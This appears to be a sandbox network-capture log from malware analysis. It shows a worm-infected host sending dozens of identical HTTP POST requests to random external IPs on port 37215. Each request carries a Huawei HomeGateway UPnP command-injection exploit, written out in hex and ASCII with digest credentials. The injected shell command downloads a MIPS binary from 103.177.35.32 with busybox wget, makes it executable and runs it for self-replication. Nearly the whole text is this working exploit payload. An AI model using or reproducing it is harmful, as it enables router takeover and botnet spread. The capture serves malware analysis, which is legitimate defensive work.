                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2322192.168.2.233870241.232.245.1537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.586504936 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2323192.168.2.2345430157.229.219.25337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.587014914 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2324192.168.2.2340826114.114.87.24637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.587047100 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2325192.168.2.234329441.208.175.23637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.587353945 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2326192.168.2.2334744129.91.70.19337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.587357998 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2327192.168.2.2360320197.167.44.19837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.587421894 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2328192.168.2.234876641.175.151.17537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.587904930 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2329192.168.2.2341496197.128.171.4137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.587904930 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2330192.168.2.2340922197.113.61.1037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.587949991 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2331192.168.2.235837841.57.24.7237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.587950945 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
